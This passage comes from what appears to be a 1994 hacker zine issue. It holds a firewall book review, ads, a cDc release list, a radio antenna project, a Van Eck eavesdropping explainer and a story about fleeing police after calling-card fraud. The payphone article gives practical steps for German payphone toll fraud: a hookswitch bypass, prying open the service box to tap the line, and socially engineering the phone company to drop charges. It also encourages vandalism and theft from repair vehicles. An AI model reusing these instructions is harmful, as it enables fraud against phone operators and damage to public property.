Workbench) is largely theoretical. That is to say, it doesn't go above
|
|||
|
comments like "attack NFS". The probes and source code supplied there are
|
|||
|
for programs like IP subnet scanners and so on, and not for "high-level"
|
|||
|
stuff like ICMP bombers or similar software; only the attacks are
|
|||
|
mentioned, not to implementation. This is, by the way, quite
|
|||
|
understandable and expected, but don't buy this book if you think it
|
|||
|
will make you into some TCP/IP attacker wiz.
|
|||
|
|
|||
|
In summary:
|
|||
|
|
|||
|
THE GOOD
|
|||
|
|
|||
|
The Firewalls part is excellent. The other parts not related to
|
|||
|
hacker-tracking are good as well. The added bonuses -- in the form
|
|||
|
of a useful index, a full bibliography (with pointers to FTP sites),
|
|||
|
a TCP port list with interesting comments and a great (running out
|
|||
|
of positive descriptions here) online resources list -- are also
|
|||
|
grand (whew).
|
|||
|
|
|||
|
THE BAD
|
|||
|
|
|||
|
The hacker studies sections, based on old (circa 1992) papers, are
|
|||
|
not interesting for anyone with any knowledge of hacking and/or
|
|||
|
security who had some sort of encounters with hackers. People without
|
|||
|
this knowledge might either get the idea that: (a) all hackers are
|
|||
|
stupid and (b) all hackers are Berferd-style system formatters. Based on
|
|||
|
the fact that the authors do not make a clear-cut statement about
|
|||
|
hiring or not hiring hackers, they just say that you should think
|
|||
|
if you trust them, and that they generally appear not to have a total
|
|||
|
draconian attitude towards hackers in general, I don't think this was
|
|||
|
intentional.
|
|||
|
|
|||
|
THE UGLY (For the nitpickers)
|
|||
|
|
|||
|
There are some nasty little bugs in the book. They're not errors
|
|||
|
in that sense of the word; they're just kind of annoying -- if you're
|
|||
|
sensitive about things like being called a hacker or a cracker, they'll
|
|||
|
annoy you. Try this: although they explain why they would use the term
|
|||
|
"hacker" when referring to hackers (and not "eggsucker", or "cracker"),
|
|||
|
they often use terms like "Those With Evil Intention". Or, comparing
|
|||
|
_2600 Magazine_ to the Computer underground Digest.
|
|||
|
|
|||
|
(*) From the Firewalls FAQ <fwalls-faq@tis.com>:
|
|||
|
``A firewall is any one of several ways of protecting one
|
|||
|
network from another untrusted network. The actual mechanism
|
|||
|
whereby this is accomplished varies widely, but in
|
|||
|
principle, the firewall can be thought of as a pair of
|
|||
|
mechanisms: one which exists to block traffic, and the other
|
|||
|
which exists to permit traffic. Some firewalls place a
|
|||
|
greater emphasis on blocking traffic, while others emphasize
|
|||
|
permitting traffic.''
|
|||
|
|
|||
|
(**) This would be a great place to start a long and boring discussion
|
|||
|
about different types of hackers and how security (including firewalls)
|
|||
|
affect them. But... I don't think so.
|
|||
|
|
|||
|
(***) ftp://research.att.com:/dist/internet_security/firewall.book also
|
|||
|
contains, in text and PostScript, the list of parts, chapters and
|
|||
|
sections in the book, and the Preface section. For that reason,
|
|||
|
those sections weren't printed here.
|
|||
|
All the papers mentioned in this review can be found on that FTP
|
|||
|
site.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Announcing Bellcore's Electronic Information Catalog for Industry
|
|||
|
Clients...
|
|||
|
|
|||
|
To access the online catalog:
|
|||
|
|
|||
|
telnet info.bellcore.com
|
|||
|
login: cat10
|
|||
|
|
|||
|
or dial 201-829-2005
|
|||
|
annex: telnet info
|
|||
|
login: cat10
|
|||
|
|
|||
|
[Order up some E911 Documents Online!]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
TTTTT H H EEEEE
|
|||
|
T H H E
|
|||
|
T HHHHH EEEEE
|
|||
|
T H H E
|
|||
|
T H H EEEEE
|
|||
|
|
|||
|
CCC U U RRRR M M U U DDDD GGG EEEEE OOO N N
|
|||
|
C C U U R R MM MM U U D D G G E O O NN N
|
|||
|
C U U RRRR M M M U U D D G EEEEE O O N N N
|
|||
|
C C U U R R M M U U D D G GG E O O N NN
|
|||
|
CCC UUU R R M M UUU DDDD GGG EEEEE OOO N N
|
|||
|
|
|||
|
Bill Clinton promised good health care coverage for everyone.
|
|||
|
Bill Clinton promised jobs programs for the unemployed.
|
|||
|
Bill Clinton promised that everyone who wanted could serve in the military.
|
|||
|
Bill Clinton promised a lot. So does the Curmudgeon.
|
|||
|
But unlike Bill Clinton, we'll deliver...
|
|||
|
|
|||
|
For only $10 a year (12 issues) you'll get alternative music reviews and
|
|||
|
interviews, political reporting, anti-establishment features and
|
|||
|
commentary, short fiction, movie reviews, book reviews, and humor. Learn
|
|||
|
the truth about the Gulf War, Clipper, and the Selective Service System.
|
|||
|
Read everything you wanted to know about bands like the Offspring, R.E.M.,
|
|||
|
the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and
|
|||
|
Nine Inch Nails. Become indoctrinated by commentary that just might change
|
|||
|
the way you think about some things. Subscribe to the Curmudgeon on paper for
|
|||
|
$10 or electronically for free. Electronic subscribers don't get
|
|||
|
everything that paying subscribers do like photos, spoof ads, and some
|
|||
|
articles.
|
|||
|
|
|||
|
Paper: send $10 check or money order to the Curmudgeon
|
|||
|
4505 University Way N.E.
|
|||
|
Box 555
|
|||
|
Seattle, Washington
|
|||
|
98105
|
|||
|
Electronic: send a request to rodneyl@u.washington.edu
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
|||
|
% The Journal Of American Underground Computing - ISSN 1074-3111 %
|
|||
|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
|||
|
|
|||
|
Computing - Communications - Politics - Security - Technology - Humor
|
|||
|
-Underground - Editorials - Reviews - News - Other Really Cool Stuff-
|
|||
|
|
|||
|
Published Quarterly/Semi-Quarterly By Fennec Information Systems
|
|||
|
This is one of the more popular new electronic publications. To
|
|||
|
get your free subscription, please see the addresses below.
|
|||
|
Don't miss out on this newsworthy publication. We are getting
|
|||
|
hundreds of new subscriptions a month. This quarterly was promoted
|
|||
|
in Phrack Magazine. If you don't subscribe, you're only cheating
|
|||
|
yourself. Have a great day...and a similar tomorrow
|
|||
|
|
|||
|
* Coming soon * A Windows-based help file containing all of the issues
|
|||
|
of the magazine as well as extensive bio's of all of the
|
|||
|
editors.
|
|||
|
|
|||
|
Subscription Requests: sub@fennec.com
|
|||
|
Comments to Editors : editors@fennec.com
|
|||
|
Back issues via Ftp : etext.archive.umich.edu /pub/Zines/JAUC
|
|||
|
fc.net /pub/tjoauc
|
|||
|
|
|||
|
Submissions : submit@fennec.com
|
|||
|
Finger info : dfox@fc.net and kahuna@fc.net
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Make the best out of your European pay telephone
|
|||
|
by Onkel Dittmeyer, onkeld@ponton.hanse.de
|
|||
|
|
|||
|
-----------------------------------------------------
|
|||
|
|
|||
|
Okay guys and girls, let's come to a topic old like the creation
|
|||
|
but yet never revealed. European, or, to be more exact, German pay
|
|||
|
phone technology. Huh-huh.
|
|||
|
|
|||
|
There are several models, round ones, rectangular ones, spiffy
|
|||
|
looking ones, dull looking ones, and they all have one thing in
|
|||
|
common: If they are something, they are not what the American reader
|
|||
|
might think of a public pay telephone, unlike it's U.S. brothers,
|
|||
|
the German payphones always operate off a regular customer-style
|
|||
|
telephone line, and therefore they're basically all COCOTS, which
|
|||
|
makes it a lot easier to screw around with them.
|
|||
|
|
|||
|
Let's get on with the models here. You are dealing with two
|
|||
|
classes; coin-op ones and card-op ones. All of them are made by
|
|||
|
Siemens and TELEKOM. The coin-op ones are currently in the process
|
|||
|
of becoming extinct while being replaced by the new card-op's, and rather
|
|||
|
dull. Lacking all comfort, they just have a regular 3x4 keypad,
|
|||
|
and they emit a cuckoo tone if you receive a call. The only way to
|
|||
|
tamper with these is pure physical violence, which is still easier
|
|||
|
than in the U.S.; these babies are no fortresses at all. Well, while
|
|||
|
the coin-op models just offer you the opportunity of ripping off
|
|||
|
their money by physically forcing them open, there is a lot more
|
|||
|
fun involved if you're dealing with the card babies. They are really
|
|||
|
spiffy looking, and I mean extraordinary spiffy. Still nothing
|
|||
|
compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line
|
|||
|
pixel-oriented LCD readout displays the pure K-Radness of it's
|
|||
|
inventors. Therefore it is equipped with a 4x4 keypad that has a lot
|
|||
|
of (undocumented) features like switching the mother into touch-tone
|
|||
|
mode, redial, display block etc. Plus, you can toggle the readout
|
|||
|
between German, English, and French. There are rumors that you can
|
|||
|
put it into Mandarin as well, but that has not been confirmed yet.
|
|||
|
|
|||
|
Let's get ahead. Since all payphones are operating on a regular
|
|||
|
line, you can call them up. Most of them have a sign reading their
|
|||
|
number, some don't. For those who don't, there is no way for you to
|
|||
|
figure out their number, since they did not invent ANI yet over here
|
|||
|
in the country famous for its good beer and yodel chants. Well, try
|
|||
|
it. I know you thought about it. Call it collect. Dialing 010 will
|
|||
|
drop you to a long-distance operator, just in case you didn't know.
|
|||
|
He will connect the call, since there is no database with all the
|
|||
|
payphone numbers, the payphone will ring, you pick up, the operator
|
|||
|
will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh?
|
|||
|
|
|||
|
This would not be Phrack if there would be no way to screw it.
|
|||
|
If you examine the hook switch on it closely, you will figure out
|
|||
|
that, if you press it down real slow and carefully, there are two
|
|||
|
levels at whom it provokes a function; the first will make the phone
|
|||
|
hang up the line, the second one to reset itself. Let me make this
|
|||
|
a little clearer in your mind.
|
|||
|
|
|||
|
----- <--- totally released
|
|||
|
|
|
|||
|
|
|
|||
|
| <--- hang up line
|
|||
|
press to this level --> |
|
|||
|
| <--- reset
|
|||
|
|
|
|||
|
----- <--- totally hung up
|
|||
|
|
|||
|
Involves a little practice, though. Just try it. Dial a number
|
|||
|
it will let you dial, like 0130, then it will just sit there and
|
|||
|
wait for you to dial the rest of the number. Start pressing down
|
|||
|
the hookswitch really slow till the line clicks away into suspense,
|
|||
|
if you release it again it will return you to the dial tone and
|
|||
|
you are now able to call numbers you aren't supposed to call, like
|
|||
|
010 (if you don't have a card, don't have one, that's not graceful),
|
|||
|
or 001-212-456-1111. Problem is, the moment the other party picks
|
|||
|
up, the phone will receive a charge subtraction tone, which is a
|
|||
|
16kHz buzz that will tell the payphone to rip the first charge unit,
|
|||
|
30 pfennigs, off your card, and if you don't have one inserted and
|
|||
|
the phone fails to collect it, it will go on and reset itself
|
|||
|
disconnecting the line. Bad luck. Still good enough to harass your
|
|||
|
favorite fellas for free, but not exactly what we're looking for,
|
|||
|
right? Try this one. Push the hook lever to the suspension point,
|
|||
|
and let it sit there for a while, you will have to release it a
|
|||
|
bit every 5 seconds or so, or the phone will reset anyway. If you
|
|||
|
receive a call while doing this, a buzz will appear on the line.
|
|||
|
|
|||
|
Upon that buzz, let the lever go and you'll be connected, and
|
|||
|
the cuckoo tone will be shut up! So if you want to receive a collect
|
|||
|
call, this is how you do it. Tell the operator you accept the charges,
|
|||
|
and talk away. You can use this method overseas, too: Just tell your
|
|||
|
buddy in the states to call Germany Direct (800-292-0049) and make
|
|||
|
a collect call to you waiting in the payphone, and you save a cool
|
|||
|
$1.17 a minute doing that. So much for the kids that just want to
|
|||
|
have some cheap fun, and on with the rest.
|
|||
|
|
|||
|
Wasting so much time in that rotten payphone, you probably
|
|||
|
noticed the little black box beneath the phone. During my, erm,
|
|||
|
research I found out that this box contains some fuses, a standard
|
|||
|
Euro 220V power connector, and a TAE-F standard phone connector.
|
|||
|
Completing the fun is the fact that it's extremely easy to pry it
|
|||
|
open. The TAE-F plug is also bypassing the phone and the charge
|
|||
|
collection circuits, so you can just use it like your jack at home.
|
|||
|
Bring a crowbar and your laptop, or your Pentium tower, power it over
|
|||
|
the payphone and plug your Dual into the jack. This way you can even
|
|||
|
run a board from a payphone, and people can download the latest
|
|||
|
WaReZzzZzz right from the booth. It's preferable to obtain a key for
|
|||
|
the lock of the box, just do some malicious damage to it (yes, let
|
|||
|
the animal take control), and call Telekom Repairs at 1171 and they
|
|||
|
will come and fix it. Since they always leave their cars unlocked,
|
|||
|
or at least for the ones I ran across, you can either take the whole
|
|||
|
car or all their k-rad equipment, manuals, keys, and even their lunch
|
|||
|
box. But we're shooting off topic here. The keys are usually general
|
|||
|
keys, means they fit on all payphones in your area. There should also
|
|||
|
be a nationwide master key, but the German Minister of Tele-
|
|||
|
communications is probably keeping that one in his desk drawer.
|
|||
|
|
|||
|
The chargecards for the card-op ones appear to have a little chip
|
|||
|
on them, where each charge unit is being deducted, and since no-one
|
|||
|
could figure out how it works, or how to refill the cards or make a
|
|||
|
fake one, but a lot of German phreaks are busy trying to figure that
|
|||
|
out.
|
|||
|
|
|||
|
A good approach is also social-engineering Telekom so they turn
|
|||
|
off the charge deduction signal (which doesn't mean the call are free,
|
|||
|
but the buzz is just not transmitted any more) so the phone doesn't
|
|||
|
receive a signal to charge you any money no matter where you call.
|
|||
|
The problem with this method is that the world will spread in the
|
|||
|
neighborhood that there is a payphone where you can call for free,
|
|||
|
and therefore it will be so crowded that you can't use it, and
|
|||
|
the phone pals will catch up fast. It's fun though, I tried it, and
|
|||
|
I still get free drinks at the local pub for doing it.
|
|||
|
|
|||
|
Another k-rad feature on them is the built-in modem that they use
|
|||
|
to get their software. On a fatal error condition they appear to dial
|
|||
|
a telecom number and download the latest software just how their ROM
|
|||
|
commands them to do. We will shortly take a phone, install it some-
|
|||
|
where else and figure out where it calls, what the protocol is and
|
|||
|
what else is being transmitted, but that will probably be in another
|
|||
|
Phrack.
|
|||
|
|
|||
|
If you found out anything that might be of interest, you are
|
|||
|
welcome to mail it to onkeld@ponton.hanse.de using the public key
|
|||
|
beneath. Unencrypted mail will be killed since ponton.hanse.de is
|
|||
|
run by a paranoid bitch that reads all traffic just for the hell
|
|||
|
of it, and I don't want the phedzZz to come and beat me over the
|
|||
|
head with a frozen chunk o' meat or worse.
|
|||
|
|
|||
|
Stay alert, watch out and have fun...
|
|||
|
|
|||
|
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
|||
|
Version: 2.3a
|
|||
|
|
|||
|
mQCNAize9DEAAAEEAKOb5ebKYg6cAxaiVT/H5JhCqgNNDHpkBwFMNuQW2nGnLMvg
|
|||
|
Q0woIxrM5ltnnuCBJGrGNskt3IMXsav6+YFjG6IA8YRHgvWEwYrTeW2tniS7/dXY
|
|||
|
fqCCSzTxJ9TtLAiMDBgJFzOIUj3025zp7rVvKThqRghLx4cRDVBISel/bMSZAAUR
|
|||
|
tChPbmtlbCBEaXR0bWV5ZXIgPG9ua2VsZEBwb250b24uaGFuc2UuZGU+
|
|||
|
=b5ar
|
|||
|
-----END PGP PUBLIC KEY BLOCK-----
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
_ _ _ _
|
|||
|
((___)) INFORMATION IS JUNK MAIL ((___))
|
|||
|
[ x x ] [ x x ]
|
|||
|
\ / cDc communications \ /
|
|||
|
(' ') -cDc- CULT OF THE DEAD COW -cDc- (' ')
|
|||
|
(U) (U)
|
|||
|
deal with it, presents unto you 10 phat t-files, deal with it,
|
|||
|
S U C K E R fresh for July 1994: S U C K E R
|
|||
|
|
|||
|
New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994:
|
|||
|
|
|||
|
_________________________________/Text Files\_________________________________
|
|||
|
|
|||
|
261: "Interview with Greta Shred" by Reid Fleming. Reid conducts an in-depth
|
|||
|
interview with the editor of the popular 'zine, _Mudflap_.
|
|||
|
|
|||
|
262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile. Paper
|
|||
|
presented for the 1993 National Popular Culture Association meeting in New
|
|||
|
Orleans.
|
|||
|
|
|||
|
263: "What Color Is the Sky in Your World?" by Tequila Willy. Here's your
|
|||
|
homework, done right for you by T. "Super-Brain" Willy.
|
|||
|
|
|||
|
264: "Chicken Hawk" by Mark E. Dassad. Oh boy. Here's a new watermark low
|
|||
|
level of depravity and sickness. If you don't know what a "chicken hawk" is
|
|||
|
already, read the story and then you'll understand.
|
|||
|
|
|||
|
265: "Eye-r0N-EE" by Swamp Ratte'. This one's interesting 'cause only about
|
|||
|
half-a-dozen or so lines in it are original. The rest was entirely stuck
|
|||
|
together from misc. files on my hard drive at the time. Some art guy could say
|
|||
|
it's a buncha post-this&that, eh? Yep.
|
|||
|
|
|||
|
266: "Interview with Barbie" by Clench. Barbie's got her guard up. Clench
|
|||
|
goes after her with his rope-a-dope interview style. Rope-a-dope, rope-a-dope.
|
|||
|
This is a boxing reference to a technique mastered by The Greatest of All Time,
|
|||
|
Muhamed Ali.
|
|||
|
|
|||
|
267: "About a Boy" by Franken Gibe. Mr. Gibe ponders a stolen photograph.
|
|||
|
Tiny bunnies run about, unhindered, to find their own fate.
|
|||
|
|
|||
|
268: "Mall Death" by Snarfblat. Story about a Dumb Girl[TM]. Are you
|
|||
|
surprised?
|
|||
|
|
|||
|
269: "Prophile: Future History" by THE NIGHTSTALKER. It's the future, things
|
|||
|
are different, but the Master Hacker Dude lives on.
|
|||
|
|
|||
|
270: "Time out for Pop" by Malcolm D. Moore. Sad account of a hopless-pop.
|
|||
|
|
|||
|
__________________________________/cDc Gnuz\__________________________________
|
|||
|
|
|||
|
"And that no man might buy or sell, save he that had the mark, or the name
|
|||
|
of the Cow, or the number of his name. Here is wisdom. Let him that hath
|
|||
|
understanding count the number of the Cow: for it is the number of a man; and
|
|||
|
his number is eight billion threescore and seven million nine hundred fourty-
|
|||
|
four thousand three hundred threescore and two. So it is written." -Omega
|
|||
|
|
|||
|
|
|||
|
Yowsah, yowsah, yowsah. JULY once again, the super-hooray month which marks
|
|||
|
cDc's 8th year of existence. Outlasting everyone to completely rule and
|
|||
|
dominate all of cyberspace, blah blah blah. Yeah, think a special thought
|
|||
|
about cDc's significance in YOUR life the next time you go potty. Name your
|
|||
|
firstborn child after me, and we'll call it karmicly even, pal. My name is
|
|||
|
Leroy.
|
|||
|
|
|||
|
|
|||
|
We're always taking t-file submissions, so if you've got a file and want to
|
|||
|
really get it out there, there's no better way than with cDc. Upload text to
|
|||
|
The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post
|
|||
|
office box in Lubbock, TX. No song lyrics and bad poetry please; we'll leave
|
|||
|
that to the no-class-havin', bottom-feeder e-shoveling orgs. out there.
|
|||
|
|
|||
|
|
|||
|
News item of the month, as found by Count Zero:
|
|||
|
|
|||
|
"ROTTING PIG FOUND IN DITCH
|
|||
|
|
|||
|
VERDEN, OKLAHOMA - Responding to a tip from an employee, Verden farmer Bill
|
|||
|
McVey found a rotting pig in a ditch two miles north of town. Farmer McVey
|
|||
|
reported the pig to the authorities, because you cannot, legally, just leave a
|
|||
|
dead pig in a ditch. You must dispose of your deceased livestock properly.
|
|||
|
There are companies that will take care of this for you. As for proper
|
|||
|
disposal of large dead animals, McVey contracts with Used Cow Dealer."
|
|||
|
|
|||
|
"...and the rivers ran red with the bl00d
|
|||
|
of the Damned and the Deleted..."
|
|||
|
-Dem0nSeed
|
|||
|
|
|||
|
S. Ratte'
|
|||
|
cDc/Editor and P|-|Ear13zz |_3@DeRrr
|
|||
|
"We're into t-files for the groupies and money."
|
|||
|
Middle finger for all.
|
|||
|
|
|||
|
Write to: cDc communications, P.O. Box 53011, Lubbock, TX 79453.
|
|||
|
Internet: sratte@phantom.com.
|
|||
|
ALL cDc FILES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC.
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
cDc Global Domination Update #16-by Swamp Ratte'-"Hyperbole is our business"
|
|||
|
Copyright (c) 1994 cDc communications. All Rights Reserved.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
===[ Radio Modification Project ]===========================================>
|
|||
|
|
|||
|
Tuning in to Lower Frequency Signals June 26, 1994
|
|||
|
|
|||
|
====================================================[ By: Grendel / 905 ]===>
|
|||
|
|
|||
|
The lower frequency regions of the radio spectrum are often
|
|||
|
ignored by ham'ers, pirates, and DX'ers alike due to the
|
|||
|
relatively little known ways of tuning in. The following article
|
|||
|
will detail how to construct a simple-made antenna to tune in
|
|||
|
to the LF's and show how to adjust an amateur band type radio
|
|||
|
to receive the desired signals.
|
|||
|
|
|||
|
___________
|
|||
|
\ /
|
|||
|
\/: \/
|
|||
|
/ . \
|
|||
|
\_______/he lower frequency spectrum has been made to include
|
|||
|
the very low frequency ("VLF" 2 kHz to 30 kHz) band and a
|
|||
|
small part of the medium frequency ("MF" 300 - 500 kHz) band.
|
|||
|
For our purposes, a suitable receiver must be able to cover
|
|||
|
the 2 kHz to 500 kHz range as well as being calibrated at 10
|
|||
|
kHz intervals (standard). The receiver must also be capable of
|
|||
|
covering AM and CW broadcasts. For best capabilities, the
|
|||
|
receiver should also be able to cover LSB ("lower side band")
|
|||
|
and USB ("upper side band").
|
|||
|
|
|||
|
The Receiving System
|
|||
|
`'`'`'`'`'`'`'`'`'`'
|
|||
|
The receiver I use consists of a standard amateur HF ("High
|
|||
|
Frequency") band receiver adjusted between the 3,500 and 4,000
|
|||
|
kHz bands. This causes the receiver to act as a tuneable IF
|
|||
|
("Intermediate Frequency") and also as demodulator. You will
|
|||
|
also require a wideband LF ("Low Frequency") converter which
|
|||
|
includes a 3,500 kHz crystal oscillator. See Fig. 1:
|
|||
|
|
|||
|
.==[ Fig 1. Block Diagram ]============================.
|
|||
|
| _____ |
|
|||
|
| \ANT/ |
|
|||
|
| \./ crystal |
|
|||
|
| | ______|______ ____________ |
|
|||
|
| `-----| 2 - 500 kHz | | 3-4000 kHz | |
|
|||
|
| | Converter* |--~--| IF Receiver|---OUTPUT |
|
|||
|
| .-----|_____________| |____________| |
|
|||
|
| | |
|
|||
|
| GND |
|
|||
|
|______________________________________________________|
|
|||
|
|
|||
|
*The converter is a circuit board type 80D/L-101/PCB
|
|||
|
available from L.F. Engineering Co, 17 Jeffry Road,
|
|||
|
East Haven CT, 06513 for $43 US including S & H.One
|
|||
|
may be constructed to work with your receiver (but
|
|||
|
at a higher price no doubt).
|
|||
|
|
|||
|
Phono jack plugs and sockets are used for the interconnections
|
|||
|
throughout the receiving system and the converter and
|
|||
|
receiver (~) are connected with RG58 coax cable of no greater
|
|||
|
length than 4 ft.
|
|||
|
When tuning, the station frequency is measured by deducting
|
|||
|
3,500 kHz from the scale on the main receiver (ie. 340 kHz =
|
|||
|
3,840 kHz on the main receiver, 120 = 3,620 kHz, 95 = 3,595
|
|||
|
kHz, etc.)
|
|||
|
|
|||
|
The Ferrite End-fed Antenna
|
|||
|
`'`'`'`'`'`'`'`'`'`'`'`'`'`
|
|||
|
This is a small antenna designed to tune between 95 kHz and
|
|||
|
500 kHz. It consists of a coil wound around a ferrite rod, with
|
|||
|
a 4 ft. lead.
|
|||
|
|
|||
|
Materials:
|
|||
|
o 7 7/8" x 3/8" ferrite rod
|
|||
|
o 5" 24 SWG double cotton covered copper wire
|
|||
|
o 2 PLASTIC coated terry clips
|
|||
|
o a wood or plastic base (8 1/2" x .8" x .5")
|
|||
|
o 2 standard, two-gang 500 pF tuning capacitors
|
|||
|
o a plastic plate (preferably 2" high)
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
-- A Few Things on Van Eck's Method of Eavesdroping --
|
|||
|
Opticon the Disassembled - UPi
|
|||
|
|
|||
|
Dr Wim Van Eck, was the one who developed the anonymous method for
|
|||
|
eavesdroping computers ( and, apparently, not only ) from distance,
|
|||
|
in the laboratories of Neher, Holland. This method is based on the
|
|||
|
fact that monitors do transmit electromagnetic radiations. As a device,
|
|||
|
it is not too complex and it can be constructed from an experienced
|
|||
|
electronics phreak. It uses a simple-direction antenna which grabs
|
|||
|
monitor signals from about 800 meters away. Simplified schematics are
|
|||
|
available from Consumertronics.
|
|||
|
|
|||
|
TEMPEST stands for Transient ElectroMagnetic Pulse Emanation STandard.
|
|||
|
It concerns the quantity of electromagnetic radiations from monitors and
|
|||
|
televisions, although they can also be detected on keyboards, wires,
|
|||
|
printers and central units. There are some security levels in which such
|
|||
|
radiations are supposed to be untraceable by Van Eck systems. Those
|
|||
|
security levels or standards, are described thoroughly in a technical
|
|||
|
exposition called NACSIM 5100A, which has been characterized by NSA
|
|||
|
classified.
|
|||
|
|
|||
|
Variations of the voltage of the electrical current, cause electromagnetic
|
|||
|
pulses in the form of radio waves. In cathode ray tube ( C.R.T. ) devices,
|
|||
|
such as televisions and monitors, a source of electrons scans the internal
|
|||
|
surface and activates phosphore. Whether or not the scanning is interlaced or
|
|||
|
non-interlaced, most monitors transmit frequencies varying from 50 to 75
|
|||
|
Mhz per second. They also transmit harmonic frequencies, multiplies of the
|
|||
|
basic frequencies; for example a transmitter with signal of 10 Mhz per second
|
|||
|
will also transmit waves of 20, 30, 40 etc. Mhz. Those signals are
|
|||
|
weaker because the transmiter itself effaces them. Such variations in the
|
|||
|
voltage is what the Van Eck system receives and analyzes.
|
|||
|
|
|||
|
There are ways to prevent or make it harder for someone to monitor
|
|||
|
your monitor. Obviously you cannot place your computer system
|
|||
|
underground and cover it with a Faraday cage or a copper shield
|
|||
|
( If your case is already that, then you know more about Van Eck
|
|||
|
than I do ). What else ?
|
|||
|
|
|||
|
(1) Certain computers, such as Wang's, prevent such divulges;
|
|||
|
give preference to them.
|
|||
|
|
|||
|
(2) Place your monitor into a grounded metal box, 1.5 cm thick.
|
|||
|
|
|||
|
(3) Trace your tracer(s). They gonna panic.
|
|||
|
|
|||
|
(4) Increase of the brightness and lowering of the contrast
|
|||
|
reduces TEMPEST's power. Metal objects, like bookshelves,
|
|||
|
around the room, will also help a little bit.
|
|||
|
|
|||
|
(5) Make sure that two or more monitors are transmitting at the same
|
|||
|
frequency and let them operate simultaneously; this will confuse
|
|||
|
Van Eck systems.
|
|||
|
|
|||
|
(6) Buy or make on your own, a device which will transmit noise
|
|||
|
at your monitor's frequency.
|
|||
|
|
|||
|
(7) Act naturally. That is:
|
|||
|
|
|||
|
(a) Call IRC, join #hack and never mumble a single word.
|
|||
|
|
|||
|
(b) Read only best selling books.
|
|||
|
|
|||
|
(c) Watch television at least 8 hours a day.
|
|||
|
|
|||
|
(d) Forget altruism; there is only you, yourself
|
|||
|
and your dick/crack.
|
|||
|
|
|||
|
(8) Turn the monitor off.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
-Almost Busted-
|
|||
|
By: Deathstar
|
|||
|
|
|||
|
It all started one week in the last month of summer. Only my brother
|
|||
|
and I were at the house for the whole week, so I did whatever I wanted.
|
|||
|
Every night, I would phreak all night long. I would be either at a payphone
|
|||
|
using AT&Tz, or at home sitting on a conference. I would be on the phone
|
|||
|
till at least four or five in the morning. But one night, my luck was running
|
|||
|
thin, and I almost phreaked for the last time. I was at a payphone, using
|
|||
|
cards. I had been there since around twelve midnight.. The payphone was
|
|||
|
in a shopping center with a supermarket and a few other stores. Most every
|
|||
|
thing closed at eleven.. Except for the nearby gas station. Anyway, I was
|
|||
|
on the phone with only one person that night. I knew the card would be dead
|
|||
|
by the end of the night so I went ahead and called him on both of his lines
|
|||
|
with both of the payphones in the complex with the same card. I had talked
|
|||
|
for hours. It started to get misty and hard to see. Then, I noticed a car
|
|||
|
of some kind pulling into the parking lot. I couldn't tell what kind of
|
|||
|
car it was, because it was so dark. The car started pulling up to me, and
|
|||
|
when it was around twenty feet away I realized it was a police car. They
|
|||
|
got on the loudspeaker and yelled "Stay where you are!". I dropped the
|
|||
|
phone and ran like hell past the supermarket to the edge of the complex.
|
|||
|
I went down a bike path into a neighborhood of townhouses. Running across
|
|||
|
the grass, I slipped and fell about two or three times. I knew they were
|
|||
|
following me, so I had to hide. I ran to the area around the back of
|
|||
|
the supermarket into a forest. I smacked right into a fence and fell
|
|||
|
on the ground. I did not see the fence since it was so dark. Crawling a
|
|||
|
few feet, I laid down and tried to cover my body with some leaves and
|
|||
|
dirt to hide. I was wearing an orange shirt and white shorts. I laid
|
|||
|
as still as I could, covered in dirt and leaves. I could hear the police
|
|||
|
nearby. They had flashlights and were walking through the forest looking
|
|||
|
for me. I knew I would get busted. I tried as hard as I could to keep
|
|||
|
from shaking in fear. I lay there for around thirty minutes. Bugs were
|
|||
|
crawling around on my legs biting me. I was itching all over. I couldn't
|
|||
|
give up though, because if they caught me I knew that would be the end
|
|||
|
of my phreaking career. I was trying to check if they were still looking
|
|||
|
for me, because I could not hear them. Just as I was about to make a run
|
|||
|
for it, thinking they were gone I heard a police radio. I sat tight again.
|
|||
|
For another hour, I lay there until finally I was sure they were gone. I
|
|||
|
got up and started to run. I made my way through the neighborhood to my
|
|||
|
house. Finally I got home. It was around five thirty a.m. I was filthy.
|
|||
|
The first thing I did was call the person I was talking to on the payphone
|
|||
|
and tell him what happened. Then, I changed clothes and cleaned myself up.
|
|||
|
I checked my vmb to find that a conference was up. I called it, and told
|
|||
|
my story to everyone on.
|
|||
|
|
|||
|
I thought that was the end of my confrontation with the police, but I
|
|||
|
was wrong. The next day I had some people over at my house. Two or Three
|
|||
|
good friends. One of them said that there was a fugitive loose in our
|
|||
|
town. We were bored so we went out in the neighborhood to walk around
|
|||
|
and waste time. Hardly anyone was outside, and police cars were going
|
|||
|
around everywhere. One guy did leave his house but he brought a baseball
|
|||
|
bat with him. We thought it was funny. Anyway, we soon got bored and
|
|||
|
went back home. Watching tv, we turned to the news. They had a Report
|
|||
|
about the Fugitive. We watched. It showed a picture of the shopping
|
|||
|
center I was at. They said "One suspect was spotted at this shopping
|
|||
|
center last night at around four thirty in the morning. The officer
|
|||
|
is around ninety five percent sure that the suspect was the fugitive.
|
|||
|
He was wearing a orange shirt and white shorts, and ran when approached."
|
|||
|
I then freaked out. They were searching my neighborhood for a fugitive
|
|||
|
that didn't exist! I called back the guy I was talking to the night
|
|||
|
